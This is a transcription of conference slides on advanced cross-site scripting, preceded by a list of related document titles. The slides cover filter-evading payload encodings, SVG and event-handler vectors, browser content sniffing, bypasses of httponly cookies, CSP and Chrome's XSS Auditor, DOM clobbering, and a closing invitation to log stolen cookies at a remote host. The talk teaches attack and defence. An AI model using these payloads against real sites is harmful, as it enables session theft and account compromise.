Advanced XSS. Nicolas Golubovic



Similar documents
A Tale of the Weaknesses of Current Client-Side XSS Filtering

A Tale of the Weaknesses of Current Client-side XSS Filtering

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in

HTML5. Eoin Keary CTO BCC Risk Advisory.

Universal XSS via IE8s XSS Filters

Relax Everybody: HTML5 Is Securer Than You Think

Project 2: Web Security Pitfalls

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

X-Frame-Options: All about Clickjacking?

Attacks on Clients: Dynamic Content & XSS

Web Application Exploits

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense

Next Generation Clickjacking

XSS Lightsabre techniques. using Hackvertor

Finding XSS in Real World

Analysis of Browser Defenses against XSS Attack Vectors

Protection, Usability and Improvements in Reflected XSS Filters

Securing Server/Client side Applications against XSS attack via XSS-Obliterator

Intrusion detection for web applications

UI Redressing and Clickjacking. About click fraud and data theft

Web Application Security

JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK

Web App Security Keeping your application safe Joe Walker

Network Security Web Security

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

Security Model for the Client-Side Web Application Environments

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

Web Application Security

Investigation Report Regarding Security Issues of Web Applications Using HTML5

Web Application Security

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

Recent Advances in Web Application Security

Security starts in the head(er)

Complete Cross-site Scripting Walkthrough

EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS

Table of Contents. Page ii

PST_WEBZINE_0X04. How to solve XSS and mix user's HTML/JavaScript code with your content with just one script

Revisiting XSS Sanitization

Cross-Site Scripting

Hacking HTML5. No VirtualBox? VirtualBox (~4 gb needed) Apache + PHP Chrome + Firefox. unpack zeronights.zip

Exploits: XSS, SQLI, Buffer Overflow

Reliable Mitigation of DOM-based XSS

Bypassing NoScript Security Suite Using Cross-Site Scripting and MITM Attacks

Web-Application Security

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

SQL INJECTION IN MYSQL

Web Application Guidelines

AJAX and JSON Lessons Learned. Jim Riecken, Senior Software Engineer, Blackboard Inc.

1 Web Application Firewalls implementations, common problems and vulnerabilities

The Image that called me

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

Created by Johannes Hoppe. Security

Secure Programming Lecture 12: Web Application Security III

Application security testing: Protecting your application and data

Blackbox Reversing of XSS Filters

Ethical Hacking Penetrating Web 2.0 Security

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Cookie Same Origin Policy

Check list for web developers

Protecting Browser State from Web Privacy Attacks. Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University

XSS-GUARD : Precise Dynamic Prevention of Cross Site Scripting (XSS) Attacks

Thomas Röthlisberger IT Security Analyst

Client-side Web Engineering From HTML to AJAX

OWASP Application Security Building and Breaking Applications

The Web s Security Model. Who am I?

Chapter 1 Web Application (In)security 1

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA

25 Million Flows Later - Large-scale Detection of DOM-based XSS

UNTAMED XSS WARS FILTERS VS PAYLOADS

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

HTML Form Widgets. Review: HTML Forms. Review: CGI Programs

HTTPParameter Pollution. ChrysostomosDaniel

Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code

Client-Side Cross-Site Scripting Protection

Sichere Webanwendungen mit Java

A Survey on Threats and Vulnerabilities of Web Services

SECURE APPLICATION DEVELOPMENT CODING POLICY OCIO TABLE OF CONTENTS

EECS 398 Project 2: Classic Web Vulnerabilities

Cross Site Scripting Prevention

Preparing for the Cross Site Request Forgery Defense

Attacking with HTML5. By,

Secure development and the SDLC. Presented By Jerry

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

JavaScript Security. John Graham Cumming

Uploaded images filter evasion for carrying out XSS attacks

XSS Reloaded. Renaud Bidou CTO. 3/13/2014 Deny All /13/2014 DenyAll Securing & Accelerating Your Applications

Transcription:

Advanced XSS Nicolas Golubovic

Image courtesy of chanpipat / FreeDigitalPhotos.net

Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httponly cookies b. Content Security Policy (CSP) c. XSS Auditor 5. Dessert: tips and tricks a. DOM clobbering 6. Cookies?

Reboiled XSS Image courtesy of picture alliance

Cross-site scripting <tag> the urge to alert(1)... injection... </tag> or <a name="injection">anchor</a>

Cross-site scripting <tag>... <script>alert(1)</script>... </tag> or <a name="" onmouseover="alert(1)" >anchor</a>

Cross-site scripting

Cross-site scripting ways to execute scripts?

Script tag <script>code</script> <script src=//url></script> <script src=//url defer></script>

Event handlers <svg onload=alert(1)> <input onfocus=alert(1) autofocus> <img src=x onerror=alert(1)>...

Pseudo-handler <a href="javascript:alert(1)">a</a> <iframe src="javascript:alert(1)"></iframe> <object data="javascript:alert(1)"> FF...

eval and similar eval('alert(1)'); settimeout('alert(1)', 0); CSS: expression(alert(1)); IE...

XSS user-supplied data presented to users XSS mostly a problem of insufficient sanitization Reflected persistent DOM-based

Blacklists & filters

Blacklists & filters Request Server urldecode, handle Response

Blacklists & filters Request Server urldecode, handle Response

Problems DOM-based XSS Server-side code does not really "understand" client-side Browsers do transform response subtle differences between Browsers!

Example javascript:alert(1) considered evil?

Example javascript:alert(1) considered evil? maybe &#x6a&#x61&#x76&#x61&#x73&#x63&#x72 &#x69&#x70&#x74:alert(1) less so ;-)

Example oh, alert(1) was the problem?

Example oh, so alert(1) was the problem? let's try \u0061\u006c\u0065\u0072\u0074(1)

Yep, it's that ugly &#x6a&#x61&#x76&#x61&#x73&#x63&#x72 &#x69&#x70&#x74&#x3a&#x5c&#x75&#x30 &#x30&#x36&#x31&#x5c&#x75&#x30&#x30 &#x36&#x63&#x5c&#x75&#x30&#x30&#x36 &#x35&#x5c&#x75&#x30&#x30&#x37&#x32 &#x5c&#x75&#x30&#x30&#x37&#x34&#x28 &#x31&#x29

Even more... decimal escapes with as many zeroes as you want: &#0000097 &colon; and other special entities --> & <!-- = valid JavaScript comments Non-alphanumeric JavaScript -> hackvertor.co.uk (Gareth Heyes)

...and more... feed:javascript:, feed:feed:javascript:, feed:feed... okay you get it (old Firefox versions) IE allows for rather interesting vectors: [0x01]javascript:, [0x02]javascript: -> shazzer.co.uk (Gareth Heyes)

...and SVG <svg><script><![cdata[\]]><![cdata[u0061]] ><![CDATA[lert]]>(1)</script> <svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>) </script> (vectors by Mario Heiderich)

Get the point? Image courtesy of imagerymajestic / FreeDigitalPhotos.net

Content sniffing Image courtesy of photostock / FreeDigitalPhotos.net

Content sniffing browsers love markup they try to recognize it where they can -> "content sniffing" IE behaved nasty today hidden in "compatibility view" want up-to-date results? github.com/qll/doesitsniff another story: charset sniffing

Chrome 27 sniffs... when MIME-type is unknown/unknown application/unknown foo or basically anything without a / when there is no MIME-type X-Content-Type-Options: nosniff works

Firefox 21 sniffs... when MIME-type is foo or basically anything without a / even when asked not to when there is no MIME-type X-Content-Type-Options: nosniff works sometimes

IE 10 sniffs... when MIME-type is application/octet-stream in compatibility view: text/plain when there is no MIME-type even when asked not to X-Content-Type-Options: nosniff works sometimes

Defenses

Defense in Depth? regular defenses: consistent charset HTML-encode in markup... multiple layers of defense so how good are they?

httponly cookies more attack surface than stealing cookies unreadable for JavaScript / plugins really?

httponly cookies more attack surface than stealing cookies unreadable for JavaScript / plugins really? depends :-) Prior to FF 16: LiveConnect html5sec.org/java (Mario Heiderich)

CSP ambitious eradicates most XSS used today silver bullet?

CSP ambitious eradicates most XSS used today silver bullet? JSONP scripting? Zalewski: lcamtuf.coredump.cx/postxss Heiderich et al.: "Scriptless Attacks"

XSS Auditor XSS Filter in Chrome aims to make reflected XSS harder compares URL to HTTP response body if matches are found they will be sanitized

XSS Auditor XSS Filter in Chrome aims to make reflected XSS harder compares URL to HTTP response body if matches are found they will be sanitized has been broken several times

XSS Auditor XSS Filter in Chrome aims to make reflected XSS harder compares URL to HTTP response body if matches are found they will be sanitized has been broken several times can be used for an attack selectively disable scripts

Tips and tricks

Tips and tricks <script> a = '</script><svg onload=alert(1)>'; </script> What will happen?

Tips and tricks <script> a = '</script><svg onload=alert(1)>'; </script> What will happen? -> it will -> </script> takes precedence

Tips and tricks short vectors with arbitrary code: <svg onload=eval(url) #\u2029alert(1) Chrome, IE, (Opera) Gareth Heyes & Stefano Di Paola <svg onload=eval(window.name) <svg onload=eval(location.hash.slice(1)) <script src=//ø.pw></script> #alert(1) kudos to Mario Heiderich for the domain without braces: location=name

Payload lifetime payload dies when user navigates away :-( even on same-origin navigation

Payload lifetime payload dies when user navigates away :-( even on same-origin navigation ideas of Heiderich & Kotowicz iceqll.eu/poc/persistent.js 100%x100% iframe uses history.pushstate / onpopstate

XSS tripwires be careful, tripwires are fashionable don't test with alert(1) use anti-sandbox tricks delete alert;alert(1) FF: Components.lookupMethod(window, 'alert') (1) be creative!

DOM clobbering? Access forms via their name: <form name=a>content</form> > document.a.innerhtml "content"

DOM clobbering? What now? <form name=queryselector>a</form>

DOM clobbering? What now? <form name=queryselector></form> > document.queryselector <form name=queryselector></form>

DOM clobbering! Consider this: <div id=a></div> <form name=queryselector></form> <script> var a = document.queryselector('#a'); a.innerhtml = 'test'; </script>

DOM clobbering! <img name=body> <form name=head> <iframe name=whatever></iframe> <form name=body> <input name=firstchild> for document.body.firstchild...

Thank you Questions?

Let the fun begin alertme.iceqll.eu/1 You can log stolen cookies and stuff here: http://l:o@g.iceqll.eu/ Slides: iceqll.eu/talks/advanced_xss

Resources Michal Zalewski: The Tangled Web, lcamtuf.coredump.cx, Browser Security Handbook Publications by Mario Heiderich et al., Mario Heiderich: html5sec.org @garethheyes: thespanner.co.uk @kkotowicz: blog.kotowicz.net @wisecwisec: code.google. com/p/domxsswiki

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information